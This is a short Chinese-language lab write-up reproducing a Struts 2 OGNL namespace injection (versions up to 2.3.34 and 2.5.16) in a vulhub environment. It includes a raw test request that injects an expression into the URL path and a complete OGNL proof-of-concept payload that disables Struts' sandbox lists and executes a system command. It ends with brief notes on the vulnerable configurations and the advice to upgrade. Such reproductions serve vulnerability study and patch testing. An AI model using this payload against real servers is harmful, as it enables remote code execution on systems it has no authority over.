环境地址:vulhub
http://172.16.1.87:8090/showcase
影响版本:小于等于 Struts 2.3.34 与 Struts 2.5.16
测试一下OGNL的表达式:${233*233}
${233*233}/actionChain1.action
请求:
GET/showcase/${233*233}/actionChain1.action HTTP/1.1
Host: 172.16.1.87:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept:text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=64576605D2AA6BD07160B7C9E6C1A7AA
X-Forwarded-For: 8.8.8.8
Connection: close
可见233*233的结果已经在返回结果头部中了!
利用OGNL表达式进行测试id:
Poc:
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
将poc进行url编码,否则无法成功!
漏洞修复:
该漏洞在两种情况下存在,第一,当xml配置中未设置namespace 值,且上层动作配置(action(s) configurations)中未设置或使用通配符namespace值时,可能导致远程代码执行漏洞的发生。第二,使用未设置 value和action值的url标签,且上层动作配置中未设置或使用通配符namespace值
所以直接升级到最新版本中可以修复漏洞!
